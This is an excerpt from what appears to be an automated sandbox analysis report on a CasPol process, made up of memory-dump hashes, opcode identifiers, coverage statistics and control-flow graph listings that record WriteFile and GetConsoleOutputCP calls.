          • Instruction Fuzzy Hash: F6D09E75A853509FCB199B74D1684683BB2AF6921672108BEE44BCB361EB7AC891CF04
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: abc0eae932e98935b14ef8c8afabb5a5094be9b3f522a4f6f2afc7fb02a6c5e3
          • Instruction ID: 7ef03f86e99a09242a98b3a379426f207bd09e5cbdc355732c6e379e8b747f8e
          • Opcode Fuzzy Hash: abc0eae932e98935b14ef8c8afabb5a5094be9b3f522a4f6f2afc7fb02a6c5e3
          • Instruction Fuzzy Hash: 1AD0A7323002048B8100CB58D4D0865B7D4FF81224704C8BFE19DCB610C773D8068BC0
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
          • Instruction ID: d8dd1db3534d9304def4866f8e9971a1086fe0a07ff9f072b3d893400ae56143
          • Opcode Fuzzy Hash: 9a0939ec5680cffb9ecca245d0aafbbebb033a67d769e75d7ec85179cdc98f5e
          • Instruction Fuzzy Hash: 4BD0673AA00008CFC700DB84E594ADDF7F1EB88325F28C1A6D915AB255C732ED56CF50
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 5e7f8cdc54eac6eceac7fa3e0c29ad67a8d5d95c9b3f2469b5e874a7bb4d2893
          • Instruction ID: 4191739c2e1617750d0868d05e93a046cb1bc1895238d4c2b1f3b60979453635
          • Opcode Fuzzy Hash: 5e7f8cdc54eac6eceac7fa3e0c29ad67a8d5d95c9b3f2469b5e874a7bb4d2893
          • Instruction Fuzzy Hash: 8DC0123A60431C934615B9A56901889B75CCD06965F4000FED94857540E6319A1582D2
          Memory Dump Source
          • Source File: 00000005.00000002.28396882723.0000000021802000.00000040.00000800.00020000.00000000.sdmp, Offset: 21802000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_21802000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: a6c18e932c5b5c9eb8083b2bfc6a647477e3b69d767bfd144a9072efd036c024
          • Instruction ID: d7a1bf504c3fe76ce103eb2fc63703bdc84dbcfcbfff510241844bb889520063
          • Opcode Fuzzy Hash: a6c18e932c5b5c9eb8083b2bfc6a647477e3b69d767bfd144a9072efd036c024
          • Instruction Fuzzy Hash: E3D05E79209A818FE302DB18C5E0BA57BE5BF52B04F4344FEAC808B763C3A8E581D201
          Memory Dump Source
          • Source File: 00000005.00000002.28396882723.0000000021802000.00000040.00000800.00020000.00000000.sdmp, Offset: 21802000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_21802000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ec2fcc27a6041accd22efe1302a7e638dadc9003504c9893ef6f80b5c1b81e4e
          • Instruction ID: 2962004d897846899e1d9255259a0da551d93739b098a76b5e46c77dfc262add
          • Opcode Fuzzy Hash: ec2fcc27a6041accd22efe1302a7e638dadc9003504c9893ef6f80b5c1b81e4e
          • Instruction Fuzzy Hash: 1AD05E343001858FDB05DB1CD5E0F6977D5AF42B04F1284EDAC508B672C3B4E880CA01
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 278f58a8936b56cde81b45a60a86ac53a18978b981fd4e1a61b0439f61058e06
          • Instruction ID: 31d3b9efac8964e2738f2bfc808d16ca3c5d73fab46430e90ce4dc5bb0ecc434
          • Opcode Fuzzy Hash: 278f58a8936b56cde81b45a60a86ac53a18978b981fd4e1a61b0439f61058e06
          • Instruction Fuzzy Hash: 55D05275A8438CCF8B06CF71C8A18CD73B0EB09220B200B7AD8028B798E3380900CF20
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: ae4514c05ec9edd00ef3c23bf5b13db6f7e2a66866f59b249a6ab3e508252e85
          • Instruction ID: 5eee1a4def25b7dbd6783228c47b3bf7db37de13e3f9d550c13e6c1b78e74558
          • Opcode Fuzzy Hash: ae4514c05ec9edd00ef3c23bf5b13db6f7e2a66866f59b249a6ab3e508252e85
          • Instruction Fuzzy Hash: C5D0122202CAC65FD3039B318C792D8BFB1FC8B20838E08CAC0C08F813C0941826C70E
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: c26f798c59611165c1754803ec8d7f12ef93d2968a70ddc375563c319b7e22f9
          • Instruction ID: 07aafbf04994e7999bacd8b1f6bd73c610a3b885690e12b7ed109e8e1e41b584
          • Opcode Fuzzy Hash: c26f798c59611165c1754803ec8d7f12ef93d2968a70ddc375563c319b7e22f9
          • Instruction Fuzzy Hash: 2CC08CB2304444AF8240CE9DE840C16F7E8EFC5228B04C4BFD24ECB200CA329803CB80
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 12b8c05c8500158d35506cfac05bedb748a957b3373a7e0ab5193080cc1056c1
          • Instruction ID: 994d90aaf6b3530c0c9aa2deda81e74fafd3f937a1f15a1094f38511ce82782d
          • Opcode Fuzzy Hash: 12b8c05c8500158d35506cfac05bedb748a957b3373a7e0ab5193080cc1056c1
          • Instruction Fuzzy Hash: C5D01235245304CBCB086B75D05846837A6AF496063100C7DD40787350DF7AD881CF44
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e78728cdda837a3a2e7d0137d8f674e0fb78e3e434ba06524bbca3641e3c6926
          • Instruction ID: 7bdedde9a242692352d8ecafa018e98b0e7fcbcc42a1236ae8c84985fae5ee3d
          • Opcode Fuzzy Hash: e78728cdda837a3a2e7d0137d8f674e0fb78e3e434ba06524bbca3641e3c6926
          • Instruction Fuzzy Hash: BBC09B3300D2CCC78F28DF999468D257378965D319F1044FBD00D4D1198B37F416C641
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 19b6fe026cb026af95f395aa65d55b514a374dc3c1b689d9836d6df7188b7864
          • Instruction ID: 95102021236ab8344cfbfa0c6a56fc49a4706481ae33b184826372a40b2b6d82
          • Opcode Fuzzy Hash: 19b6fe026cb026af95f395aa65d55b514a374dc3c1b689d9836d6df7188b7864
          • Instruction Fuzzy Hash: 48C08C322842488F8E012FB1584A219BA8CAA40214BC00076A40BC2002EF3C84044A41
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 22690482579e76392c4034c3373a719bd5f91a11525108648164d98cd89dfe5d
          • Instruction ID: 78c77589ea9cdbfb55c0a0a932be50b6911fb0a5d7811d3238968924bc19c8af
          • Opcode Fuzzy Hash: 22690482579e76392c4034c3373a719bd5f91a11525108648164d98cd89dfe5d
          • Instruction Fuzzy Hash: 17C04C77A4414A8BEB009B95E4453ECB764E780329F1440A6E21952541867502554B91
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 0de231380ff90cb0b02527447cfefbd04a2a6ec47f32563fce2055451323d4a2
          • Instruction ID: 13ea93f08ad3b27209e0c0558917cd1954cb1bb38bd228899293134518d40697
          • Opcode Fuzzy Hash: 0de231380ff90cb0b02527447cfefbd04a2a6ec47f32563fce2055451323d4a2
          • Instruction Fuzzy Hash: 50C02B330C524CCA82049EB00805C153308A6C0305B4084F9900100010CB3258528923
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 910d6a9fb9f5bc80fed30e9d40b621bba47fc52d9522225803f6f1dd9147b1ba
          • Instruction ID: 502302d7877cf8368459ba971e34c11c98878b10e2251d4022af82c7c635d95b
          • Opcode Fuzzy Hash: 910d6a9fb9f5bc80fed30e9d40b621bba47fc52d9522225803f6f1dd9147b1ba
          • Instruction Fuzzy Hash: C4B0123265464C0B5740AEB11808602328C954040534000749C0DC5001F519D0904644
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 98d32be50dd634b8f9ee25c74b23562728bc8f930d0c92791a6c0e0453ed1be1
          • Instruction ID: 66998bd3785455eebdd967f3f6ff7ec159682994971030ffe97e655424421408
          • Opcode Fuzzy Hash: 98d32be50dd634b8f9ee25c74b23562728bc8f930d0c92791a6c0e0453ed1be1
          • Instruction Fuzzy Hash: B0B012661C1B0C07895037F8108907D33DC0E56028BC000F9554E426809F2954404591
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: dcac760612507ea1da3931f558968ca914e685ec80323f6ff81d754cf581df80
          • Instruction ID: 302be64765880d9fb06648a7fff644bd21c3c3a36a22e566a032aad86114ada9
          • Opcode Fuzzy Hash: dcac760612507ea1da3931f558968ca914e685ec80323f6ff81d754cf581df80
          • Instruction Fuzzy Hash: 24B092B208838D978109EA21C88ACD9B629EE0A642BD00575F8020509DDBB869044ADA
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
          • Instruction ID: 0f9fb5dc4bd4ea912bab9168bcfafa9e89a552c33551db60ed0cb65eb0c0f0fc
          • Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
          • Instruction Fuzzy Hash: CDB092B7A04049C9DB00CA84B4417DDF720E790229F104073C31066004C23211648691
          Memory Dump Source
          • Source File: 00000005.00000002.28419003714.0000000023BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 23BD0000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_5_2_23bd0000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 05d980f4d475ded044f0b3b06273548e9e91038fce78f98e394fc32e8a685903
          • Instruction ID: 58330e0c717245f8afe76dae2c9b67a55fdf0170ed4df7d33438d458a5744030
          • Opcode Fuzzy Hash: 05d980f4d475ded044f0b3b06273548e9e91038fce78f98e394fc32e8a685903
          • Instruction Fuzzy Hash: FAA0023F64829DD7CB64EF20E593C5A33226F9D6407E18AF0860411528853A5805C951

          Execution Graph

          Execution Coverage:7.4%
          Dynamic/Decrypted Code Coverage:100%
          Signature Coverage:0%
          Total number of Nodes:21
          Total number of Limit Nodes:1
          execution_graph 2495 efa4de 2497 efa513 WriteFile 2495->2497 2498 efa545 2497->2498 2518 efa4aa 2519 efa4de WriteFile 2518->2519 2521 efa545 2519->2521 2499 1190221 2500 1190254 2499->2500 2502 11902a9 2499->2502 2503 11902c3 2502->2503 2504 119030a 2503->2504 2507 efa23a 2503->2507 2511 efa1f4 2503->2511 2504->2500 2508 efa263 GetConsoleOutputCP 2507->2508 2509 efa28c 2507->2509 2510 efa278 2508->2510 2509->2508 2510->2504 2512 efa23a GetConsoleOutputCP 2511->2512 2514 efa278 2512->2514 2514->2504 2515 1190230 2516 1190254 2515->2516 2517 11902a9 2 API calls 2515->2517 2517->2516

          Callgraph

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 0 11904b0-11904cd 2 1190590-11905d5 0->2 3 11904d3-11904f1 0->3 6 11905db-11905e0 2->6 7 119088a-1190891 2->7 8 119058b-119058f 3->8 9 11904f7-11904fa 3->9 642 11905e3 call 10f05df 6->642 643 11905e3 call 10f0606 6->643 10 1190893-11908f1 call 11904b0 7->10 11 11908f6-11908fd 7->11 9->2 12 1190500-1190528 9->12 10->11 14 11908ff-1190912 call 11904b0 11->14 15 1190917-119091e 11->15 51 1190530-119053e 12->51 13 11905e9-11905ed 16 11905f3-11905f6 13->16 17 1190776-119077a 13->17 14->15 22 11905fc-1190604 16->22 23 119091f-1190959 16->23 20 1190881-1190884 17->20 21 1190780-1190796 17->21 20->6 20->7 43 1190798 21->43 44 119079d-11907d2 21->44 25 1190659-1190665 22->25 26 1190606-119060a 22->26 33 119095f-1192dfb 23->33 34 1192e06-1192e11 23->34 25->23 39 119066b-1190681 25->39 26->23 31 1190610-1190615 26->31 31->25 37 1190617-1190652 31->37 33->34 37->25 52 1190761-1190770 39->52 53 1190687-1190693 39->53 43->44 71 1190809-119081e 44->71 72 11907d4-11907f4 44->72 55 1190581-1190585 51->55 56 1190540-1190547 51->56 52->16 52->17 64 11906b0-11906c5 53->64 65 1190695-119075f 53->65 55->8 55->9 56->55 62 1190549-119057b 56->62 62->55 81 119074b-1190750 64->81 82 11906cb-11906d6 64->82 65->17 87 1190820-119082b 71->87 88 1190877-119087c 71->88 644 11907f6 call 10f05df 72->644 645 11907f6 call 10f0606 72->645 81->15 94 11906e9-11906fc 82->94 95 11906d8-11906e7 82->95 100 119082d-119083c 87->100 101 119083e-1190851 87->101 88->15 93 11907fc-1190801 call 1192e28 102 1190807 93->102 106 11906fe-1190743 94->106 95->94 95->106 100->101 112 1190853-119086f 100->112 101->112 102->20 106->81 112->88 642->13 643->13 644->93 645->93
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID: %Z=g^$%[=g^$5Z=g^$5[=g^$EY=g^$EZ=g^$UY=g^$UZ=g^$eY=g^$eZ=g^$uY=g^$uZ=g^$Y=g^$Z=g^
          • API String ID: 0-1539986449
          • Opcode ID: 12dff03d15a98676578f5691c5cdf2e10f4c91cbd1ed375c927c05bede724e84
          • Instruction ID: bdb914e09d611ffaf8027dcbe4ae25360c86da070ec57d26cad9e899a8da5788
          • Opcode Fuzzy Hash: 12dff03d15a98676578f5691c5cdf2e10f4c91cbd1ed375c927c05bede724e84
          • Instruction Fuzzy Hash: 3243B5746002598FC708DF25D844A69B7F2FF88308F5086ADE5099B39ACB71ED86DF91

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 646 efa4aa-efa535 650 efa579-efa57e 646->650 651 efa537-efa557 WriteFile 646->651 650->651 654 efa559-efa576 651->654 655 efa580-efa585 651->655 655->654
          APIs
          • WriteFile.KERNELBASE(?,00000E24,867C0970,00000000,00000000,00000000,00000000), ref: 00EFA53D
          Memory Dump Source
          • Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: 345e14358bb958d3e9b050d4dd86bef0504ca4a7cb68311d942e2c6fe186d8fe
          • Instruction ID: 75a28e4f0f7259718c286df896330009e492955099e921b6d4fc0887497bee8f
          • Opcode Fuzzy Hash: 345e14358bb958d3e9b050d4dd86bef0504ca4a7cb68311d942e2c6fe186d8fe
          • Instruction Fuzzy Hash: 2521B5754093C4AFD7228B61DC44FA6BFB8EF06314F0884DBE9849F1A3D265A518C7B6

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 658 1192f60-1192f94 call 11904b0 663 1192fb3-1193007 call 11904b0 call 1190938 658->663 664 1192f96-1192fa9 call 11904b0 658->664 678 119300d-1193015 call 1190938 663->678 679 11931d7-11931dd 663->679 669 1192fae 664->669 670 1193392-1193399 669->670 683 119301b-1193023 678->683 684 119339c-11933c2 678->684 679->670 681 11931e3-119321c call 11904b0 679->681 708 119321e-1193222 681->708 709 1193282-11932bb call 11904b0 681->709 686 1193029-1193031 call 1190938 683->686 687 11931c8-11931d1 call 1190938 683->687 693 1193391 684->693 694 11933c4 684->694 686->684 697 1193037-119303f 686->697 687->678 687->679 693->670 697->687 699 1193045-119304f 697->699 701 1193051-1193053 699->701 702 1193055-119305b 699->702 703 1193063-1193065 701->703 702->703 705 119308e-1193099 call 1190938 703->705 706 1193067-119306f call 1190938 703->706 716 119309f-11930a7 call 1190938 705->716 717 1193197-119319f call 1190938 705->717 706->684 715 1193075-1193088 706->715 713 1193248-1193256 708->713 714 1193224-119322d 708->714 709->670 749 11932c1-11932ca 709->749 713->684 723 119325c-1193271 713->723 714->684 728 1193233-1193246 714->728 715->687 715->705 716->684 730 11930ad-11930b5 716->730 717->684 729 11931a5-11931c3 call 11904b0 717->729 731 1193276-1193280 723->731 728->713 728->731 729->687 732 1193188-1193191 call 1190938 730->732 733 11930bb-11930c3 call 1190938 730->733 731->708 731->709 732->716 732->717 733->684 745 11930c9-11930d1 733->745 745->732 747 11930d7-11930df call 1190938 745->747 747->684 751 11930e5-11930f4 call 1190938 747->751 749->684 754 11932d0-11932d8 749->754 751->684 758 11930fa-119310c 751->758 756 11932de-11932e7 754->756 757 1193382-119338c 754->757 756->684 762 11932ed-11932f5 756->762 757->693 757->749 758->732 763 119310e-1193122 758->763 764 119335d-1193366 762->764 765 11932f7-1193306 762->765 769 1193128 763->769 770 1193124-1193126 763->770 764->684 772 1193368-119337d 764->772 765->684 771 119330c-1193344 call 11904b0 765->771 773 119312b-1193166 call 1190938 769->773 770->773 771->684 783 1193346-119335b call 11904b0 771->783 772->757 773->684 787 119316c-1193183 call 11904b0 773->787 783->757 787->732
          Strings
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID: :@~g
          • API String ID: 0-2887969434
          • Opcode ID: 691cf95b29bde8af96aea22d943434a12a11103d455d1891363fed37756e8731
          • Instruction ID: 79440dbb65e52ae14a78f9019a9e4964e5474ee0676282c462d8a6e6586d0509
          • Opcode Fuzzy Hash: 691cf95b29bde8af96aea22d943434a12a11103d455d1891363fed37756e8731
          • Instruction Fuzzy Hash: 8FD18F34600215DFCF09EB78D598A2DB7F6BF48308F16C4A9E5269B262DB30ED41CB52

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 793 efa1f4-efa261 795 efa28c-efa291 793->795 796 efa263-efa276 GetConsoleOutputCP 793->796 795->796 797 efa278-efa28b 796->797 798 efa293-efa298 796->798 798->797
          APIs
          • GetConsoleOutputCP.KERNELBASE ref: 00EFA269
          Memory Dump Source
          • Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd
          Similarity
          • API ID: ConsoleOutput
          • String ID:
          • API String ID: 3985236979-0
          • Opcode ID: 87c63b37f492f8b2bdc80911f9ad98595a9311389d91cbcd21c7ae726e151974
          • Instruction ID: 455468d861f01b9ae180f37bf4aeedcfe6bc0f177a54f3b999fee7bb6eba9a8e
          • Opcode Fuzzy Hash: 87c63b37f492f8b2bdc80911f9ad98595a9311389d91cbcd21c7ae726e151974
          • Instruction Fuzzy Hash: 0821AC7540D7C09FD7138B658C94692BFB4EF03220F0E80DBD9848F1A3D269AD09CBA2

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 801 efa4de-efa535 804 efa579-efa57e 801->804 805 efa537-efa53f WriteFile 801->805 804->805 807 efa545-efa557 805->807 808 efa559-efa576 807->808 809 efa580-efa585 807->809 809->808
          APIs
          • WriteFile.KERNELBASE(?,00000E24,867C0970,00000000,00000000,00000000,00000000), ref: 00EFA53D
          Memory Dump Source
          • Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd
          Similarity
          • API ID: FileWrite
          • String ID:
          • API String ID: 3934441357-0
          • Opcode ID: 0e434dde383e5b34a069e1f26e71bf82fe94cf30576bb451668c4639dba1d102
          • Instruction ID: 7a4e7c018a66c78829a36e6c7ca688f0e506291afbff843435005f739c1c63e3
          • Opcode Fuzzy Hash: 0e434dde383e5b34a069e1f26e71bf82fe94cf30576bb451668c4639dba1d102
          • Instruction Fuzzy Hash: 8411E275400204AFEB21DF51DC44FBAFBA8EF04324F08846AEA499E251C375A444CBB6

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 812 efa23a-efa261 813 efa28c-efa291 812->813 814 efa263-efa276 GetConsoleOutputCP 812->814 813->814 815 efa278-efa28b 814->815 816 efa293-efa298 814->816 816->815
          APIs
          • GetConsoleOutputCP.KERNELBASE ref: 00EFA269
          Memory Dump Source
          • Source File: 00000008.00000002.24004578066.0000000000EFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EFA000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_efa000_CasPol.jbxd
          Similarity
          • API ID: ConsoleOutput
          • String ID:
          • API String ID: 3985236979-0
          • Opcode ID: 80be9254b855bf0af705cd0d0ecf39e7b152211ba12ecb142837f58d87b80089
          • Instruction ID: 735227892222193c7ab5ef2fffeb233b882d29030b7bae37e951a5b8b75b0b42
          • Opcode Fuzzy Hash: 80be9254b855bf0af705cd0d0ecf39e7b152211ba12ecb142837f58d87b80089
          • Instruction Fuzzy Hash: 44F0AF749042488FEB208F05D888771FBD0EF04725F48C0AADE095F362D37AA944CAA2

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 819 1192e28-1192e41 821 1192e4c-1192e57 call 1190938 819->821 822 1192e43-1192e4b 819->822 825 1192e59-1192e61 call 1190938 821->825 826 1192e98-1192ea0 821->826 829 1192ea1-1192f24 825->829 830 1192e63-1192e75 825->830 985 1192f26 call 10f05df 829->985 986 1192f26 call 1192e28 829->986 987 1192f26 call 1192f60 829->987 988 1192f26 call 10f0606 829->988 833 1192e8d-1192e96 call 1190938 830->833 834 1192e77-1192e7f call 1190938 830->834 833->825 833->826 834->829 841 1192e81-1192e8c 834->841 846 1192f2c-1192f94 call 11904b0 855 1192fb3-1193007 call 11904b0 call 1190938 846->855 856 1192f96-1192fa9 call 11904b0 846->856 870 119300d-1193015 call 1190938 855->870 871 11931d7-11931dd 855->871 861 1192fae 856->861 862 1193392-1193399 861->862 875 119301b-1193023 870->875 876 119339c-11933c2 870->876 871->862 873 11931e3-119321c call 11904b0 871->873 900 119321e-1193222 873->900 901 1193282-11932bb call 11904b0 873->901 878 1193029-1193031 call 1190938 875->878 879 11931c8-11931d1 call 1190938 875->879 885 1193391 876->885 886 11933c4 876->886 878->876 889 1193037-119303f 878->889 879->870 879->871 885->862 889->879 891 1193045-119304f 889->891 893 1193051-1193053 891->893 894 1193055-119305b 891->894 895 1193063-1193065 893->895 894->895 897 119308e-1193099 call 1190938 895->897 898 1193067-119306f call 1190938 895->898 908 119309f-11930a7 call 1190938 897->908 909 1193197-119319f call 1190938 897->909 898->876 907 1193075-1193088 898->907 905 1193248-1193256 900->905 906 1193224-119322d 900->906 901->862 941 11932c1-11932ca 901->941 905->876 915 119325c-1193271 905->915 906->876 920 1193233-1193246 906->920 907->879 907->897 908->876 922 11930ad-11930b5 908->922 909->876 921 11931a5-11931c3 call 11904b0 909->921 923 1193276-1193280 915->923 920->905 920->923 921->879 924 1193188-1193191 call 1190938 922->924 925 11930bb-11930c3 call 1190938 922->925 923->900 923->901 924->908 924->909 925->876 937 11930c9-11930d1 925->937 937->924 939 11930d7-11930df call 1190938 937->939 939->876 943 11930e5-11930f4 call 1190938 939->943 941->876 946 11932d0-11932d8 941->946 943->876 950 11930fa-119310c 943->950 948 11932de-11932e7 946->948 949 1193382-119338c 946->949 948->876 954 11932ed-11932f5 948->954 949->885 949->941 950->924 955 119310e-1193122 950->955 956 119335d-1193366 954->956 957 11932f7-1193306 954->957 961 1193128 955->961 962 1193124-1193126 955->962 956->876 964 1193368-119337d 956->964 957->876 963 119330c-1193344 call 11904b0 957->963 965 119312b-1193166 call 1190938 961->965 962->965 963->876 975 1193346-119335b call 11904b0 963->975 964->949 965->876 979 119316c-1193183 call 11904b0 965->979 975->949 979->924 985->846 986->846 987->846 988->846
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f924a4de0ace45bfb36343c578f672839d5ae84eaeba9d702fe1d56a5eee48e2
          • Instruction ID: 3ac6911482c6588192cafece96c133daf93d664737b3815cf58eb11e483ef6f5
          • Opcode Fuzzy Hash: f924a4de0ace45bfb36343c578f672839d5ae84eaeba9d702fe1d56a5eee48e2
          • Instruction Fuzzy Hash: 8B416535B042258FCF09EFB8D8505AEBBF5EF89314F0580AAE955DB252DB348D41CB92

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 989 11902a9-11902ff 997 11903a2-11903a6 989->997 998 1190305 989->998 1016 1190305 call efa23a 998->1016 1017 1190305 call efa1f4 998->1017 999 119030a 1000 1190311-1190338 999->1000 1000->997 1005 119033a-119036d 1000->1005 1005->997 1012 119036f-119039b 1005->1012 1012->997 1016->999 1017->999
          Memory Dump Source
          • Source File: 00000008.00000002.24005129500.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_8_2_1190000_CasPol.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 2672e506a8600988164ce1c4f2e3b626a6c3b1b19172844dafd0efd5f1f18b50
          • Instruction ID: 29bfb787b59fdb1a11b602ce283559fae1c0f0090d7ef4cb1785a1bd9e37fb23
          • Opcode Fuzzy Hash: 2672e506a8600988164ce1c4f2e3b626a6c3b1b19172844dafd0efd5f1f18b50
          • Instruction Fuzzy Hash: A0212E34B052048FDB19AB79D114A6D37E69FDD308B2445BCE216DB7A1DF35CC418B52

          Control-flow Graph

          • Executed
          • Not Executed
